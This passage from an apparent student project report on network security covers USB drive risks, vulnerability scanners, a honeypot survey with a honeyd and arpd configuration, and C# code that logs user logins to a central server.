server. Unless the company’s antivirus policies are very aggressive, and that all

files stored on the network are actively scanned, Flash Drives can present a new

vector for computer viruses that is nearly impossible to defend against. Most

Antivirus softwares operate "reactively" to threats and can only identify viruses

that have been previously identified. Therefore, a virus writer could theoretically

infect a corporate network by plugging a USB flash drive in any computer and

open the virus file.

• Malicious Software: In addition to viruses, users could bring in unauthorized

software or data files from home such as shareware programs, software pranks,

MP3 files, video clips and other files that may violate corporate policies.

Moreover, a user with bad intentions can bring in spy ware or keystroke loggers

that could enable him to capture passwords and other sensitive information.

• Data Theft: This includes corporate espionage, i.e. steeling secret and vital data

from the company’s server (like client lists, sales forecasts, research data…) in a

matter of few minutes and sell it to competitors, hackers…

73

A lot of measures can be done to prevent any misuse of USB flash drives, raging from

soft measures to hard security measures such as:

• Educating the users: it is important for the users of the network to know the

risks that such devices can present. Moreover, a company should establish a

policy for taking data out of the office, or bringing files from home.

• Enforce the lock desktop policy: essential measure if a user account has access

to sensitive data, to prevent any theft of data while user is away.

• Frequently update antivirus policies and actively scan network on regular

basis

• Restrict USB ports on desktop: USB devices cannot be managed using Group

Policy in Windows 2000 or XP. However, USB ports can be disabled on all

desktops or on desktops that have access to sensitive data. In doing so, the

administrator will need to make sure any peripherals in use (such as keyboards,

mice, scanners) use legacy ports instead of USB ports. Note that in most corporate

networks, printers are assigned to specialized network print servers and may not

be an issue. Also, 3rd party tools such as Secure Wave’s SecureNT software (that

we highly recommend) can allow businesses to control end user access to I/O

devices (including USB ports).

To disable the use of USB storage devices on a computer running Windows, the

following can be done [19]:

1. Open Windows Explorer or My Computer.

2. Navigate to the %SystemRoot%\Inf folder.

3. Right Click the Usbstor.pnf file and choose Properties.

74

4. Select the Security tab.

5. In the Group or user names list, select the user or group that you wish to

deny access to and check/uncheck the Deny box for each option: read,

write, read and write…

6. Press OK.

Alternatively, some companies ban the access to the E: or X: drive, which is the name of

the drive that is added when a USB flash drive is accessed. But this method is not

recommended as it can be bypassed easily.

4.3 Creating Common and User Files

To simulate a real company, we have created different sort of folders and files:

• A networked shared folder that can be accessible by any user with company files

(such as word documents with names, phone numbers…)

• A folder for each user that can only be accessed by the concerned user, with excel

sheets, word documents, pictures, etc… to simulate a real life business situation.

On of the main aim of the hackers’ team will be to steal the data in those files, change it,

create new fake files, etc… Off course, these files were backed-up daily, so in case the

hackers delete/edit them, vital company information will not be lost.

4.4 Scanning the Network and Updating Security

A lot of free ware tools, or software tools that are available on trial versions can be found

on the internet. They are very useful to administrators as they perform network scans and

detect any vulnerability in the network. We have used them whenever possible (i.e.

whenever available for free or in trial version) to enhance our network security.

75

4.4.1 Linux Tools

• PortSentry: this tools monitors network probes and attacks against the server. It

can also be configured to log and counter these probes and attacks. See appendix

for detailed steps.

• CHKROOTKIT: this tool can be downloaded at www.chkrootkit.org. It scans

the system for known exploits, Trojan commands, and worms used to

compromise a system. Usually, CHKROOTKIT does not perform very well when

PortSentry is also being used.

• Nessus: Nessise searches and localizes vulnerabilities on the system by actively

trying to perform known exploits against the system. When vulnerabilities are

found, it makes recommendations about upgrades and configuration changes. The

software is available at http://nessus.org.

4.4.2 Windows Tools

The main tool we used to scan our Windows server and network domain was GFI

Languard (available in free, 15 days trial version). This program basically scans the

network for missing patches, services packs, open ports and other vulnerabilities and

recommends solutions to those vulnerabilities. By running Languard, we were able for

example to notice that some vital patches for network security were missing.

Also, we have found a useful tool called EventAlarm (available in free 30 days trial

version) that gives messages, or alarms, to the administration, whenever something

76

specified has taken place. For example, the administrator can set EventAlarm to give a

message every time a user logs in, or every time a computer in the network crashes or has

problems. In this way, monitoring the network can be easier.

4.5 Confusing the Hackers: Honey Pots

4.5.1 What is a Honeypot

Honeypots are a new technology for the network security industry whose value, unlike

most security tools designed to defend and protect a computer network, lies in being

probed, attacked, or compromised. Honeypots expect no data, so any traffic to or from it

is most likely unauthorized activity. There are two general types of honeypots:

production and research. Production honeypots are easy to use, capture only limited

information, and used primarily by companies or corporations. Production honeypots are

used to protect a network, they directly help secure an organization’s network. Research

honeypots are different; they are used to collect information. Research honeypots are

complex to deploy and maintain, capture extensive information, and used primarily by

research, military, or government organizations. Neither solution is better than the other,

it all depends on what we want to achieve. From now on, we will concentrate on

production honeypots since they are the ones relevant to our FYP being used for

protection purposes. We will use the word honeypot in the sense of production honeypot

from now on. Honeypots are not limited to solving only one problem, they have a number

of different applications. For prevention, honeypots can be used to slow down or stop

automated attacks. For example, the honeypot LaBrea Tarpit is used slow down

77

automated TCP attacks, such as worms. But in general, honeypots are not effective

prevention mechanisms. Against human attackers, honeypots can utilize psychological

weapons such as deception or discouragement to confuse or stop attacks. Honeypots can

also be used to detect unauthorized activity, they excel at this capability due to their

advantages. Traditional detection solutions can flood organizations with alerts, yet only a

few of the alerts signal valid attacks. Also, many of today's technologies are not designed

to detect unknown attacks. Honeypots help resolve both of these problems. Honeypots

generate very few alerts, but when they do it is almost sure that something malicious has

happened. Honeypots can also detect and capture unknown attacks as well as known

attacks. Finally, honeypots can be used to respond to an attack. If an attacker breaks into

an organization, and one of the systems he broke into was a honeypot, then information

gathered from that system can be used to respond to the break-in. Honeypots can also be

used to identify an attacker once he is in an organization’s network. They can operate on

any variety of computer systems and just about any type of computer. While most public

domain software for setting up a honeypot is written for UNIX, many of these systems

have already been ported to Windows. [20]

4.5.2 Classifications of Honeypots

Levels of Interaction

We have already talked about classification based on functionality (production and

research honeypots) in the honeypot definition above. In this section, we will classify

honeypots by level of interaction. When dealing with honeypots there is a direct

correlation between the amount of data that can be collected and the amount of damage

that can be done by an attacker. The more information the honeypot is able to collect the

78

greater the risk, the complexity and the level of interaction. We mean by risk, the chance

that an attacker can use the honeypot to harm, attack, or infiltrate other systems or

organizations.

Low Interaction Honeypots

A low interaction honeypot is one that is easy to install, configure, deploy, and maintain.

Because the attacker can do less than he might with other higher interaction honeypots, it

is less risky to implement. Low interaction honeypots do not allow the attacker access to

an operating system from which he might attack other systems, which also significantly

reduces risk. Low interaction honeypots are normally production honeypots, as they are

used to protect an organization. Since low interaction honeypots restrict an attacker's

activity, they are limited in the amount of information they can give about an attacker.

The information received from this type of honeypot is usually restricted to the the time

and date of attack, the source IP address and source port of the attack and the destination

IP address and destination port of the attack. An example of a low interaction honeypot is

BackOfficer Friendly (BOF). BackOfficer Friendly emulates a limited number of

services. By limiting the number of services, the attacker is restricted to how much he can

interact with the honeypot. BackOfficer Friendly will be discussed in greater detail in the

next section. The honeypot allows an attacker to connect to a port and attempt to execute

a restricted number of commands, after which the attacker is disconnected.

79

Figure 4.1: BackOfficer Friendly detecting an unauthorized connection

Medium Interaction Honeypots

Medium interaction honeypots offer attackers more ability to interact than low interaction

honeypots, but less than those considered high interaction. They are usually more time-

consuming to install and configure as they normally involve a high level of development

and customization from an organization. As attackers have an increased ability to interact

with this type of honeypot, more caution must be used to ensure that the attacker does not

have access to other systems. An example of a medium interaction honeypot would be

the use of the jail. This functionality allows an administrator to partition an operating

system environment, creating a virtual operating system within a real operating system.

The virtual operating system can be controlled by the real operating system, but gives the

appearance and feel of a true operating system. The goal is for an attacker to attack and

gain access to the jailed environment, and then the attacker's activities can be heavily

monitored or controlled from the real or master operating system. A medium interaction

honeypot is more complicated to deploy and comes with a higher risk, increasing the

chance that something may go wrong. However, with greater risk comes greater reward;

80

medium interaction honeypots may be configured to allow the administrator to gather

types of attacks information data.

High Interaction Honeypots

High interaction honeypots are most often research honeypots. They are used, at a great

amount of risk, to gather large amounts of information about attackers. The goal of a high

interaction honeypot is to give the attacker access to a real operating system where

nothing is emulated or restricted. High interaction honeypots give users the opportunity

to capture the tools, monitor the activity, and even learn how hackers communicate with

one another. Since this type of honeypot allows the attacker to interact with a real

operating system there is the possibility that an attacker might use the honeypot to attack

other computers. In order to ensure that this does not take place, high interaction

honeypots need to be placed within a controlled environment that restricts the ability of a

hacker to launch attacks from within. One of the difficulties in maintaining this type of

architecture is to not allow the attacker to realize that he is being monitored in a

controlled environment. Because of the amount of risk involved and the complexity in

their implementation, high-interaction honeypots may be extremely difficult to configure,

install, and maintain. Nevertheless, they are the best resource for studying the hacker

community as well as for capturing worms and viruses for analysis.

81

4.5.3 Review of most popular Honeypots Low Interaction

A- BackOfficer Friendly

http://www.nfr.com/products/bof/

B- Specter

http://www.specter.com

C- Honeyd

http://www.citi.umich.edu/u/provos/honeyd/

D- Decoy Server

http://www.recourse.com

E- Honeynets

High interaction http://project.honeynet.org/papers/honeynet/

A- BackOfficer Friendly (BOF)

BackOfficer Friendly is a low interaction honeypot developed by NFR Security Inc that

can run on almost any Windows-based platform to include Windows 95 and Windows

98. Back Officer Friendly was originally created to detect when anyone attempts a Back

Orifice scan against a computer. Back Orifice is a remote control trojan penetration

application from which a hacker can for example access files on the infected computer,

send msgs, open and close the CD-drive etc... Much like a computer virus, it is

distributed as an embedded program within downloadable shareware utilities and

executable greeting card programs. When the user opens the downloaded file Back

Orifice installs itself on the user's machine and allows the attacker complete control of

the computer through the Internet connection. It has since evolved to detect attempted

connections to other services, such Telnet, FTP, SMTP, POP3 and IMAP2. When BOF

82

receives a connection to one of these services, it will fake replies to the hopeful hacker,

wasting the attacker's time, and will give us time to stop them from other harms.

Basically, it pretends to be a Back Orifice server for example, BackOfficer Friendly gives

the attacker false answers that look like they came from Back Orifice, while logging the

attackers IP address and the operations they attempted to perform. So, BackOfficer

Friendly is a spoofing server application which notifies whenever someone attempts to

remote control a system.

Figure 4.2- BOF screen capture showing spoofed services

Figure 4.3: BOF warnings

83

B- Specter

SPECTER is a smart honeypot or deception system. It simulates a complete machine,

providing an interesting target to lure hackers away from the production machines.

SPECTER offers common Internet services such as SMTP, FTP, POP3, HTTP and

TELNET which appear perfectly normal to the attackers but in fact are traps for them to

mess around and leave traces without even knowing that they are connected to a decoy

system, which does none of the things it appears to do, but instead logs everything and

notifies the appropriate people. Furthermore, SPECTER automatically investigates the

attackers while they are still trying to break in. SPECTER provides massive amounts of

luring content and it generates luring programs that will leave hidden marks on the

attacker's computer. Automated weekly online updates of the honeypot's content and

vulnerability databases allow the honeypot to change constantly without user interaction.

Like BOF, Specter is a low interaction honeypot that offers no operating system for the

attacker to access. Yet, Specter offers far more functionality, including the ability to

monitor more services and to more realistically emulate the applications. Additionally,

the system may be configured to emulate vulnerabilities, making it more attractive to

hackers, and to even deliver bogus information to a hacker during an attack.

Specter may be configured to have five different "personalities" or characters:

• Open: The system behaves like a badly configured system in terms of security.

• Secure: The system behaves like a well-configured system in terms of security.

84

• Failing: The system behaves like a machine with various hard and software

problems.

• Strange: The system behaves unpredictably and leaves the intruder wondering

what is going on.

• Aggressive: The system communicates as long as necessary to collect information

about the attacker, then reveals its true identity by the appropriate means,

depending on the kind of connection, and then ends communication. This is very

handy to scare intruders away.

These personalities encourage the attacker to continue to interact with the honeypot and

therefore increase the amount of information available to the administrator. [21]

85

Figure 4.4: Specter GUI

C- Honeyd

Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be

configured to run arbitrary services, and their personality can be adapted so that they

appear to be running certain operating systems. Honeyd enables a single host to claim

multiple addresses

The different TCP personalities are learned from reading a nmap fingerprint file. The

configured personality is the operating system that nmap or xprobe will return.

Personalities can be annotated to determine if they allow FIN-scans for open ports or to

86

select the preference in which they reassemble fragmented IP packets. Honeyd can be

used to create a virtual honey net or for general network monitoring. It supports the

creation of a virtual network topology including dedicated routes and routers. The routes

can be attributed with latency and packet loss to make the topology seem more realistic.

[22]

D- Decoy Server

By creating a realistic mock network environment, the solution serves as an attack target

in order to protect critical areas of the network. As a supplement to security solutions

such as firewalls, it employs advanced decoy technology to enable early warning and

detection to divert and confine attacks. Symantec Decoy Server sensors deliver detection

and response and provide detailed information through its system of data collection

modules. Every action is recorded for analysis, allowing administrators to understand the

threat and implement an appropriate, policy-based response. Advanced filters enable the

solution to automatically discard insignificant events, leaving only the data required to

respond effectively to any incident. Decoy Server creates a jailed environment in which

attackers have access to virtual cages as opposed to limited operating systems. The cages

are controlled environments from which the attacker is unable to escape. Decoy Server is

able to create up to four of these cages on a single system. Being a high interaction

honeypot, Decoy Server is able to capture much more information about attacks, but, as

mentioned earlier, this comes with an increased risk. The greatest risk is that, once

attacked, the system will be used to attack other systems. Another risk is in the

complexity of administrating the Decoy Server. Errors made in the configuration process

or during system maintenance increase the chance that something may go wrong during

87

implementation. Of course, the greatest concern is that the attacker may be able to

capitalize on an error made by the administrator or compromise the system to such a

degree that they are able to attack the host operating system. [23]

Figure 4.5: A possible deployment of Decoy Server.

E-Honeynets

A honeynet is a type of honeypot which has high interaction and is designed primarily for

research. It is through this extensive interaction we gain information on threats, both

external and internal to an organization. What makes a honeynet different from most

honeypots is that it is an entire network of systems. Instead of a single computer, a

honeynet is a network of systems desinged for attackers to interact with. These victim

systems (honeypots within the honeynet) can be any type of system, service, or

information we want to provide. Its is this flexibility that gives honeynets their true

power.

88

The common elements of a honeynet are:

A firewall computer: which logs all incoming/outgoing connections and provides NAT

(network address translation) service and some Denial of Service protection.

An intrusion detection (IDS) computer: The IDS box is sometimes on the same box as

the firewall, but it should be on an entirely separate computer that can see all of the

network traffic. It also logs all the network traffic and looks for known exploits and

attacks.

A remote System Log computer: the honeypot is slightly modified so that all commands

an intruder would use are sent to System Log. System Log is then set to remote log to the

remote System Log box.

The honeypot itself: The honeypot can be anything from a default Redhat 6.2 installation

to a mirror of one of our production systems.

One of the unique features of a honeynet is that, rather than emulating a single system

like BOF and Specter or multiple systems like Honeyd and Decoy Server, it is actually a

network of standard production systems. The systems are put behind some type of access

control device and monitored for activity.

89

Figure 4.6: Honeynet architecture

Honeynets are clearly the riskiest of the honeypot solutions. Once an attacker gains

access to a complete operating system, available in the honeynet, there are no limitations

as to what they may be able to do to the system. They may use the system to compile

code, communicate with other hackers, distribute tools, or launch attacks on other

systems. The only thing restricting the hacker's activities is the access control device on

the outside of the honeypots. Another concern, is the complexity involved in configuring

and maintaining a honeynet. Rules have to be established for all incoming and outgoing

connections. System logs must capture all activity and forward it to a remote log server

for review by the administrator. Any error in these configurations could expose the

honeynet and its associated network and administrator to increased risk. [24]

90

4.5.4 Our selection and work

We chose to install honeyd on our network because it has the highest interaction between

the low interaction honeypots. It has many features and is relatively simple to use. It has a

Unix and Windows version. Since it is open source we can emulate our own services on

it. The primary purpose of Honeyd is detection, specifically to detect unauthorized

activity within an organization. It does this by monitoring all the unused IPs in a network.

Any attempted connection to an unused IP address is assumed to be unauthorized or

malicious activity. For example, if a network has a class C address, it is unlikely that

every one of those 254 IP addresses is being used. Any connection attempted to one of

those unused IP addresses is most likely a probe, a scan, or a worm hitting the network.

Honeyd can monitor all of these unused IPs at the same time. Whenever a connection is

attempted to one of them, Honeyd automatically assumes the identity of the unused IP

addresses and then interacts with the attacker. This approach to detection has many

advantages over traditional methods. Any time Honeyd generates an alert, it most likely

is a real attack, not a false alarm. Henyd also not only detects known attacks, but

unknown ones as well. By default, Honeyd can detect (and log) any activity on any UDP

or TCP port, as well as some ICMP activity. We can also create with honeyd emulated

services that interact with the attacker. These emulated services determine what the

attacker is attempting to do, what they are looking for. We can do this by creating scripts

that listen on specific ports and then interact with attackers in a predetermined manner.

For example, we can create an FTP script that emulates a wu-ftpd daemon on Linux, or a

Telnet connection on a Cisco router. These emulated services are limited because they act

91

in a predetermined behavior. The script can be written in almost any language, such as

Perl, Shell, or Expect. Below is an example of a service emulating a Cisco router.

attacker $telnet 192.168.1.150

Trying 192.168.1.150...

Users (authorized or unauthorized) have no explicit or

implicit expectation of privacy. Any or all uses of this

system may be intercepted, monitored, recorded, copied,

audited, inspected, and disclosed to authorized site,

and law enforcement personnel, as well as to authorized

officials of other agencies, both domestic and foreign.

By using this system, the user consents to such

interception, monitoring, recording, copying, auditing,

inspection, and disclosure at the discretion of authorized

site.

Unauthorized or improper use of this system may result in

administrative disciplinary action and civil and criminal

penalties. By continuing to use this system you indicate

your awareness of and consent to these terms and conditions

of use. LOG OFF IMMEDIATELY if you do not agree to the

conditions stated in this warning.

User Access Verification

Username: cisco

Password:

92

% Access denied

The honeyd log of the attack would look like this:

Jan 3 11:23:32 marge honeyd[22885]: Connection request: (192.168.1.10:2783 -

192.168.1.150:23)

Jan 3 11:23:32 marge honeyd[22885]: Connection established:(192.168.1.10:2783 -

192.168.1.150:23) <-> /usr/bin/perl scripts/router-telnet.pl

Jan 3 11:23:42 marge honeyd[22885]: E(192.168.1.10:2783 - 192.168.1.150:23):

Attempted login: cisco/cisco

Jan 3 11:23:47 marge honeyd[22885]: Connection dropped with reset:

(192.168.1.10:2783 - 192.168.1.150:23)

To implement Honeyd we need to compile and use two tools: Arpd and Honeyd. Honeyd

cannot do everything alone and requires the help of Arpd. Arpd is used for ARP

spoofing; this is what actually monitors the unused IP space and directs attacks to the

Honeyd honeypot. Honeyd does not have the capability to direct attacks to it, it only has

the capability to interact with attackers. The commands to start both are listed below. The

networks in the below code are the networks that Arpd will monitor and Honeyd will

interact with. In this example, the honeypot monitors all unused IP space in the

192.168.1.0/24 network.

arpd 192.168.1.0/24

honeyd -p nmap.prints -f honeyd.conf 192.168.1.0/24

93

So, based on the command above, the Arpd process will monitor any unused IP space on

the 192.168.1.0/24 network. If it sees any packets going to unused IP's, it will direct those

packets to the Honeyd honeypot using Arp spoofing, a layer two attack. Its spoofs the

victim's IP address with the MAC address of the Honeypot. For the Honeyd command, -

p nmap.prints refers to the Nmap fingerprint database. This is the actual database that

the scanning tool Nmap uses to fingerprint operating systems. We can get the latest

Nmap fingerprint database from Nmap. The second option for the Honeyd process, -f

honeyd.conf, is the honeypot configuration file. This determines how we want the

honeypot to behave.

## Honeyd configuration file ##

### Windows computers (default)

create default

set default personality "Windows NT 4.0 Server SP5-SP6"

set default default tcp action reset

add default tcp port 110 "sh scripts/pop.sh"

add default tcp port 80 "perl scripts/iis-0.95/main.pl"

add default tcp port 25 block

add default tcp port 21 "sh scripts/ftp.sh"

add default tcp port 22 proxy $ipsrc:22

add default udp port 139 drop

set default uptime 3284460

### Cisco router

create router

94

set router personality "Cisco 4500-M running IOS 11.3(6) IP Plus"

add router tcp port 23 "/usr/bin/perl scripts/router-telnet.pl"

set router default tcp action reset

set router uid 32767 gid 32767

set router uptime 1327650

# Bind specific templates to specific IP address

# If not bound, default to Windows template

bind 192.168.1.150 router

We start off with by creating different types of computers we want to emulate

(templates). These templates define the behavior of each emulated operating system. In

this configuration file we have created two different emulated computers: default and

router. The first thing we need to do in each template is assign the "personality"; this is

what operating system will emulate at the IP stack level. We give it the OS type using the

same description in the Nmap fingerprint database. In the above example, for the

template default, we have assigned the personality "Windows NT 4.0 Server SP5-SP6"

and for the template router we have given it the personality "Cisco 4500-M running IOS

11.3(6) IP Plus". Note, the personality does not affect the behavior of the emulated

services, it only modifies the behavior of the IP stack. For the emulated services, we have

to select different scripts based on what type of OS we want to emulate. If our personality

is Windows, it is not intelligent to bind an emulated Apache script to the HTTP port.

Instead, we would bind an emulated IIS script to the HTTP port.

The next step is to define the behavior of each port. We can either assign specific ports

specific behavior, or define general behavior. In the abve example, in the template default

95

all the TCP ports are assigned the behavior reset, so they respond with a RST to any

connection attempts (for UDP, ICMP port unreachable). Other options are open (will

respond with ACK, or for UDP nothing) or block (will not respond for both TCP and

UDP).

Once we have created our templates, we have to decide which IP addresses are bound to

which template. Using the bind command, as we do in the router template, we can bind

the template to specific IP addresses. In this case, if anyone attempts to connect to IP

address 192.168.1.150, they will be interacting with the Honeyd honeypot using the

router template. The default template is a key template to Honeyd. The template with the

name default becomes the default for all other connections to non-used IP space. So if

any connections are made to any unused IP space in the 192.168.1.0/24 network, they

will get a Windows box emulated by Honeyd, except for the IP 192.168.1.150, at which

they will get the Cisco router.

During our implementation of the above mentioned procedures we faced some

difficulties. First of all, nmap was not installed on the fedora workstations so we had to

install it. Second, we had to get some missing libraries in order to compile honeyd

(libevent - an asynchronous event library, libdnet - the network library, libpcap - a packet

capture library).

4.6 User Logs

In order to monitor the users logging on the network we decided to write a code that

records and stores all the logins and logouts of all users with their respective times and

dates. This software is written in C#.net and will help us trace an internal attack to the

user behind it by checking the application for the last logged in user. Instead of reading

96

the logs from the standard windows log file which is susceptible to change by any novice

internal attacker we used the “System.Security.Principal” library in order to get the

username and domain of each logged user. The general idea of the code is to obtain the

username, domain and cloktime from the system send them through sockets to the server

where they are stored in a file and are ready for display.

The software consists of two applications: the server application and the client

application.

Client application:

The task of this application is to get the username and domain and send them to the

server application.

The libraries used in this application to provide us with the necessary tools where

“System.Security.Principal”, “System.Net”, “System.Net.Sockets”.

“System.Security.Principal”: This library was useful because it contains the

WindowsIdentity class which in its turn contains the GetCurrent() function specified for

getting the username and domain. The function use is illustrated in the code below:

WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString()+" "+user.User.ToString()+" "+DateTime.Now.ToString()); socClient.Send(byData); “System.Net”: This library allows us to specify the destination ip addresses and endpoints

and to specify the protocol type.

“System.Net.Sockets”: this library is used to create new sockets through which the data

“byData” is sent to the destination ip.

97

class SocketPkt { public System.Net.Sockets.Socket socket; public byte[] dataBuffer = new byte[1024]; }

Full Client Application Code:

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.Net; using System.Net.Sockets; using System.Security.Principal; namespace TestClient { public partial class MainForm : Form { private Socket socClient; private string serverIP = "192.168.1.101"; private int serverPort = 54323; private IAsyncResult asynResult; public AsyncCallback fnCallBack = null; public MainForm() { InitializeComponent(); try { socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); IPAddress ipAdd = IPAddress.Parse(serveIP); IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort); socClient.Connect(serverEP); WaitForData(); } catch (SocketException se) { MessageBox.Show(se.Message, "Unable to Connect to Server"); } try { WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes(Environment.NewLine+ "*UserName: "

98

+ user.Name.ToString() + " " + "Login Time: " + " " + DateTime.Now.ToString()); socClient.Send(byData); } catch { } } public void WaitForData() { if (fnCallBack == null) { fnCallBack = new AsyncCallback(OnDataReceived); } SocketPkt socketPkt = new SocketPkt(); socketPkt.socket = socClient; asynResult = socClient.BeginReceive(socketPkt.dataBuffer, 0, socketPkt.dataBuffer.Length, SocketFlags.None, fnCallBack, socketPkt); } public void OnDataReceived(IAsyncResult asyn) { try { SocketPkt socketPkt = (SocketPkt)asyn.AsyncState; int iRx = 0; iRx = socketPkt.socket.EndReceive(asyn); char[] chars = new char[iRx + 1]; Decoder d = Encoding.UTF8.GetDecoder(); int charLen = d.GetChars(socketPkt.dataBuffer, 0, iRx, chars, 0); string strData = new string(chars); parseReceivedData(socketPkt.socket, strData); WaitForData(); } catch (ObjectDisposedException) { System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n"); } catch (SocketException se) { MessageBox.Show(se.Message); } } private void parseReceivedData(Socket socket, string data) { //String szData = "Again"; //byte[] byData = System.Text.Encoding.ASCII.GetBytes(szData); //socClient.Send(byData); } private void btnConnect_Click(object sender, EventArgs e) {

99

try { socClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); IPAddress ipAdd = IPAddress.Parse(serverIP); IPEndPoint serverEP = new IPEndPoint(ipAdd, serverPort); socClient.Connect(serverEP); WaitForData(); } catch (SocketException se) { MessageBox.Show(se.Message, "Unable to Connect to Server"); } } private void btnClose_Click(object sender, EventArgs e) { socClient.Disconnect(false); socClient.Close(); } private void btnSend_Click(object sender, EventArgs e) { WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes(user.Name.ToString()+" "+user.User.ToString()+" "+DateTime.Now.ToString()); socClient.Send(byData); } private void MainForm_FormClosed(object sender, FormClosedEventArgs e) { try { if (e.CloseReason == CloseReason.WindowsShutDown) { WindowsIdentity user = WindowsIdentity.GetCurrent(); byte[] byData = System.Text.Encoding.ASCII.GetBytes("UserName: " + user.Name.ToString() + " " + "Logout Time :" + " " + DateTime.Now.ToString()); socClient.Send(byData); } } catch { } } } }

100

Server Application:

The task of this application is to receive he data sent by the client application sent over

TCP/IP , store this data into a log file and display them at h user’s will.

The libraries used in this application to provide us with the necessary tools where “

“System.Net”, “system.IO”, system.Net.Sockets”.

“System.Net”: This library allows us to specify the destination ip addresses and endpoints

and to specify the protocol type.

“System.Net.Sockets”: This library is used to create new sockets through which each

logged in user is assigned a socket of his own.

class SocketPkt { public System.Net.Sockets.Socket socket; public byte[] dataBuffer = new byte[1024]; public bool isActive = false; }

“System.IO”: Used to stream read and write from and onto files

StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII);

Server Application Output Format: (Figure 4.7)

101

N.B. The clear button clears the display but the Log file remains intact.

Full Server Application Code:

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Text; using System.Windows.Forms; using System.Net.Sockets; using System.Net; using System.IO; namespace Server_akiki { public partial class Server : Form { private Socket socListener = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp); private int serverPort = 54323; static private int maxConnections = 1000; private SocketPkt[] clientSocket = new SocketPkt[maxConnections]; private AsyncCallback fnCallBack = null; private IAsyncResult asynResult;

102

public Server() { InitializeComponent(); FillList(); for (int i = 0; i < maxConnections; i++) { clientSocket[i] = new SocketPkt(); } Start(); } private void FillList() { StreamReader sr = new StreamReader("C:\\Log.txt", Encoding.ASCII); while (!sr.EndOfStream ) { string x = sr.ReadLine(); if(x!= "" ) LogList.Items.Add(x); } sr.Close(); } //private void Start_Click(object sender, EventArgs e) //{ // for (int i = 0; i < maxConnections; i++) // { // clientSocket[i] = new SocketPkt(); // } // Start(); //} private void Start() { try { IPEndPoint ipLocal = new IPEndPoint(IPAddress.Any, serverPort); socListener.Bind(ipLocal); socListener.Listen(maxConnections); socListener.BeginAccept(new AsyncCallback(OnClientConnect), null); } catch (SocketException se) { Console.Write(se.Message); } } public void OnDataReceived(IAsyncResult asyn) {

103

int idx = (int)asyn.AsyncState; try { int iRx = 0; iRx = clientSocket[idx].socket.EndReceive(asyn); char[] chars = new char[iRx + 1]; Decoder d = Encoding.UTF8.GetDecoder(); int charLen = d.GetChars(clientSocket[idx].dataBuffer, 0, iRx, chars, 0); string strData = new string(chars); if (strData.EndsWith("\0")) strData = strData.Substring(0, strData.Length - 1); WriteDataToFile(strData); WaitForData(idx); } catch (ObjectDisposedException) { System.Diagnostics.Debugger.Log(0, "1", "\nOnDataReceived: Socket has been closed\n"); } catch (SocketException se) { if (clientSocket[idx].socket.Connected) { Console.Write("OnDataReceived: " + se.Message); } else { clientSocket[idx].isActive = false; } } } private void WriteDataToFile(string strData) { LogList.Items.Add(strData); LogList.Refresh(); try { StreamWriter swr = new StreamWriter("C:\\Log.txt", true, Encoding.ASCII); swr.WriteLine(strData+ "\n"); swr.Close(); } catch (Exception ex) { MessageBox.Show(ex.ToString());} } public void WaitForData(int idx) { if (fnCallBack == null) { fnCallBack = new AsyncCallback(OnDataReceived);

104

} asynResult = clientSocket[idx].socket.BeginReceive(clientSocket[idx].dataBuffer, 0, clientSocket[idx].dataBuffer.Length, SocketFlags.None, fnCallBack, idx); } public void OnClientConnect(IAsyncResult asyn) { try { int idx = getFirstInactive(); clientSocket[idx].socket = socListener.EndAccept(asyn); clientSocket[idx].isActive = true; socListener.BeginAccept(new AsyncCallback(OnClientConnect), null); WaitForData(idx); } catch (ObjectDisposedException) { System.Diagnostics.Debugger.Log(0, "1", "\n OnClientConnection: Socket has been closed\n"); } catch (SocketException se) { Console.Write("OnClientConnect: " + se.Message); } } private int getFirstInactive() { for (int i = 0; i < maxConnections; i++) { if (!clientSocket[i].isActive) { return i; } } return -1; } private void sendData(int socketIdx, string strData) { byte[] byData = System.Text.Encoding.ASCII.GetBytes(strData); clientSocket[socketIdx].socket.Send(byData); } public void BroadCastData(string strData, string Quote) { } private void Clear_Click(object sender, EventArgs e) { if (LogList.SelectedItems.Count != 0) LogList.ClearSelected(); else

105

LogList.Items.Clear(); } } }

5. Countering the Attacks

Now that the network was ready and secured, it was time to counter the attacks

performed by the hackers’ team. They started attacking externally, and they were then

given a user account to attack internally.

5.1 First Attack

The first attack was performed in the first week of May. None of our scanners and event

alarms pinpointed it, but we discovered what had been done by social engineering (some

colleagues were assisting the hackers’ team, and told us about the attack).

When the hackers could not log in from the outside (due to firewall security), they

plugged their computer on one of our switch’s ports, i.e. on the internal network, and

performed an extensive scan.

Although such an attack was not meant to happen, as it did not follow some pre-set

guidelines, we still searched for a way to prevent it.

We decided that the best way to prevent non-users is preventing foreign MAC/ip

addresses from accessing the network from without or within. Our firewall does not

support software platforms but others higher in caliber routers (10/100 4-Port VPN Router (RV042))

can accommodate such platforms like openRG which allows you to manually configure

your firewall. After downloading this software on the router you will not only be able to

have a secure and sophisticated firewall but you will also have control over your internal

106

LAN ips and MAC addresses. Before going deep in the calibration of a firewall we will

give a general view of the firewall mechanism, the firewall rules and the firewall chains

and then give example on each of the last two.

Firewall Mechanism

The firewall configuration is a set of:

• Firewall rules (rule set)

• Firewall active devices

• Firewall configuration flags

The firewall rule set is a set of firewall rules that are represented in firewall opcodes for

execution by the kernel (data-path module) for each packet the firewall traversals.

The rules source:

• The user, through the different tabs in the security screen.

• The user, when configuring general definitions that have an effect on the firewall.

For example, changing the security level (High/Typical/Maximum), adding or

removing the firewall from a device, or changing the route level of a device

(NAT/NAPT/ROUTE).

• Tasks that present the need to open a port in the firewall, like the PPTP or IPsec

servers.

• The firewall itself, to block security hazards packets.

The firewall rules can be roughly divided into three categories:

107

